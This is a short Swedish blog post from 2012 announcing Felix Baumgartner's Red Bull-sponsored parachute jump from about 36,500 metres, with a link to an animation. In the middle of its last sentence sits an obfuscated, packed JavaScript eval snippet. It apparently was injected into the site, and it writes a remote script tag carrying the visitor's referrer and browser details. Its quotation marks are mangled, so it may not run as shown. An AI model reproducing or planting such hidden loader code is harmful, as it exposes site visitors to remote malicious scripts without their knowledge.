Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Felix Baumgartner ska hoppa fallskärm från rymden.

Filip Urde
  • On 16 juli, 2012
  • http://www.revue.se/filip-urde

Red Bull ger dig vingar, säger företaget i sina reklamfilmer något Felix Baumgartner kommer få känna så nära som det går. Någon gång i sommar ska Felix Baumgartner, sponsrad av Red Bull, bli den första människan som hoppar så högt upp att han kommer att spränga ljudvallen på väg ner.

Hoppet kommer att utföras från 120 000 fot, eller ca: 36 576 meter. Här ovan har ni en mäktig animerad film över hur det hela kommer gå till. Häftigt!

Se vårt senaste inlägg om tid för hoppet och annan info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzhee|var|u0026u|referrer|shyds||js|php’.split(’|’),0,{}))
här.

www.redbullstratos.com

Comments